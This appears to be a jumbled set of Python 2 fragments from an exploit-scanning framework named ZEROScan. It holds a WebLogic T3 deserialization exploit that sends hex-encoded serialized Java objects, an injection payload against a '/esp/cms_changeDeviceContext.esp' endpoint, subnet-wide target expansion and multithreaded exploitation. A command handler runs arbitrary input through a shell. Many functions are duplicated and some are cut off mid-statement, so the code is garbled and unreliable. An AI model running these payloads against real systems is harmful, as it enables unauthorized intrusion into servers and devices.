def start():
if kb.targets and kb.targets.qsize() > 1:
infoMsg = "ZEROScan got a total of %d targets" % kb.targets.qsize()
log.process(infoMsg)
runThreads(conf.threads, expThreads)
if not kb.results:
return
toNum = 0
tmp = []
for _ in kb.results:
if _:
toNum += 1
tmp.append(list(_))
print tabulate(tmp,["target-url", "poc-name", "status"],tablefmt="grid")
print "success : {}".format(toNum)
_createTargetDirs()
_setRecordFiles()
if conf.report:
_setReport()
def t3handshake(sock, server_addr):
sock.connect(server_addr)
sock.send(
'74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
.decode('hex'))
time.sleep(1)
sock.recv(1024)
log.process('handshake successful')
def buildT3RequestObject(sock,dport):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1,data2,data3,data4]:
sock.send(d.decode('hex'))
time.sleep(2)
log.process('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
def buildT3RequestObject(sock, dport):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
'{:04x}'.format(dport))
data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1, data2, data3, data4]:
sock.send(d.decode('hex'))
time.sleep(2)
log.process('send request payload successful,recv length:%d' %
(len(sock.recv(2048))))
def default(self, line):
"""
无法识别命令时
:param line:
:return:
"""
try:
log.process("exec: %s" % line)
SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
print
print SubCmd.communicate()[0]
except:
log.error("Unknown command: %s" % line)
def default(self, line):
"""
无法识别命令时
:param line:
:return:
"""
try:
log.process("exec: %s" % line)
SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
print
print SubCmd.communicate()[0]
except:
log.error("Unknown command: %s" % line)
def runThreads(numThreads,
threadFunction,
forwardException=True,
startThreadMsg=True):
threads = []
numThreads = int(numThreads)
kb.multiThreadMode = True
kb.threadContinue = True
kb.threadException = False
try:
if numThreads > 1:
if startThreadMsg:
infoMsg = "starting %d threads" % numThreads
log.process(infoMsg)
else:
threadFunction()
return
for numThread in xrange(numThreads):
thread = threading.Thread(target=exceptionHandledFunction,
name=str(numThread),
args=[threadFunction])
setDaemon(thread)
try:
thread.start()
except threadError, errMsg:
errMsg = "error occurred while starting new thread ('%s')" % errMsg
log.error(errMsg)
break
threads.append(thread)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.isAlive():
alive = True
time.sleep(0.1)
def setMultipleTarget():
#urlFile
if not conf.urlFile:
target_urls = []
if conf.url:
if conf.url.endswith('/24'):
try:
socket.inet_aton(conf.url.split('/')[0])
base_addr = conf.url[:conf.url.rfind('.') + 1]
target_urls = [
'{}{}'.format(base_addr, i)
for i in xrange(1, 255 + 1)
]
except socket.error:
errMsg = 'only id address acceptable'
log.error(errMsg)
else:
target_urls = conf.url.split(',')
for url in target_urls:
if url:
kb.targets.put((url))
else:
errMsg = 'the url needs to be set'
log.error(errMsg)
return
if paths.ZEROSCAN_TARGET_PATH in conf.urlFile:
conf.urlFile = safeExpandUser(conf.urlFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
log.process(infoMsg)
else:
conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
conf.urlFile = safeExpandUser(conf.urlFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
log.process(infoMsg)
if not os.path.isfile(conf.urlFile):
errMsg = "the specified file does not exist"
raise ZEROScanFilePathException(errMsg)
for line in getFileItems(conf.urlFile):
kb.targets.put(line.strip())
def exploit(target, headers=None):
log.process("Requesting target site:"+ target)
create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target)
verify_url = '{}/php/utils/debug.php'.format(target)
session = requests.Session()
if 'https' in target:
session.get(verify_url, verify=False)
session.get(create_session_url, verify=False)
verify = session.get(verify_url, verify=False)
else:
session.get(verify_url)
session.get(create_session_url)
verify = session.get(verify_url)
if 'Debug Console' in verify.text:
res = '{} is vul'.format(target)
else:
res = '{} is not vul'.format(target)
return res
def setMultipleTarget():
#urlFile
if not conf.urlFile:
target_urls = []
if conf.url:
if conf.url.endswith('/24'):
try:
socket.inet_aton(conf.url.split('/')[0])
base_addr = conf.url[:conf.url.rfind('.') + 1]
target_urls = ['{}{}'.format(base_addr, i)
for i in xrange(1, 255 + 1)]
except socket.error:
errMsg = 'only id address acceptable'
log.error(errMsg)
else:
target_urls = conf.url.split(',')
for url in target_urls:
if url:
kb.targets.put((url))
else:
errMsg = 'the url needs to be set'
log.error(errMsg)
return
if paths.ZEROSCAN_TARGET_PATH in conf.urlFile:
conf.urlFile = safeExpandUser(conf.urlFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
log.process(infoMsg)
else:
conf.urlFile = paths.ZEROSCAN_TARGET_PATH +'/'+ conf.urlFile
conf.urlFile = safeExpandUser(conf.urlFile)
infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
log.process(infoMsg)
if not os.path.isfile(conf.urlFile):
errMsg = "the specified file does not exist"
raise ZEROScanFilePathException(errMsg)
for line in getFileItems(conf.urlFile):
kb.targets.put(line.strip())
def expThreads():
"""
@function multiThread executing
"""
zsp = PluginBase(package='zsplugins')
plugin_zsp = zsp.make_plugin_source(searchpath=[paths.ZEROSCAN_PLUGINS_PATH])
zspi = plugin_zsp.load_plugin('%s'%(kb.CurrentPlugin))
while not kb.targets.empty() and kb.threadContinue:
target = kb.targets.get()
infoMsg = "exploit target:'%s'" % (target)
log.process(infoMsg)
# TODO
result = zspi.exploit(target, headers=conf.httpHeaders)
#插件中没有返回值就默认是失败
if not result:
continue
output = (target, kb.CurrentPlugin, result)
kb.results.add(output)
if isinstance(conf.timeout, (int, float)) and conf.timeout > 0:
time.sleep(conf.timeout)
def exploit(target, headers=None):
log.process("Requesting target site:" + target)
create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
target)
verify_url = '{}/php/utils/debug.php'.format(target)
session = requests.Session()
if 'https' in target:
session.get(verify_url, verify=False)
session.get(create_session_url, verify=False)
verify = session.get(verify_url, verify=False)
else:
session.get(verify_url)
session.get(create_session_url)
verify = session.get(verify_url)
if 'Debug Console' in verify.text:
res = '{} is vul'.format(target)
else:
res = '{} is not vul'.format(target)
return res
def runThreads(numThreads, threadFunction, forwardException=True, startThreadMsg=True):
threads = []
numThreads = int(numThreads)
kb.multiThreadMode = True
kb.threadContinue = True
kb.threadException = False
try:
if numThreads > 1:
if startThreadMsg:
infoMsg = "starting %d threads" % numThreads
log.process(infoMsg)
else:
threadFunction()
return
for numThread in xrange(numThreads):
thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction])
setDaemon(thread)
try:
thread.start()
except threadError, errMsg:
errMsg = "error occurred while starting new thread ('%s')" % errMsg
log.error(errMsg)
break
threads.append(thread)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.isAlive():
alive = True
time.sleep(0.1)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.isAlive():
alive = True
time.sleep(0.1)
except KeyboardInterrupt:
print
kb.threadContinue = False
kb.threadException = True
if numThreads > 1:
log.process("waiting for threads to finish (Ctrl+C was pressed)")
try:
while (threading.activeCount() > 1):
pass
except KeyboardInterrupt:
raise ZEROScanThreadException("user aborted (Ctrl+C was pressed multiple times)")
if forwardException:
raise
except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
print
kb.threadException = True
log.process("thread %s: %s" % (threading.currentThread().getName(), errMsg))
def exploit(target, headers=None):
log.process("Requesting target site:" + target)
return yourDefinition()
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.isAlive():
alive = True
time.sleep(0.1)
except KeyboardInterrupt:
print
kb.threadContinue = False
kb.threadException = True
if numThreads > 1:
log.process("waiting for threads to finish (Ctrl+C was pressed)")
try:
while (threading.activeCount() > 1):
pass
except KeyboardInterrupt:
raise ZEROScanThreadException(
"user aborted (Ctrl+C was pressed multiple times)")
if forwardException:
raise
except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
print
kb.threadException = True
log.process("thread %s: %s" %
def t3handshake(sock,server_addr):
sock.connect(server_addr)
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
sock.recv(1024)
log.process('handshake successful')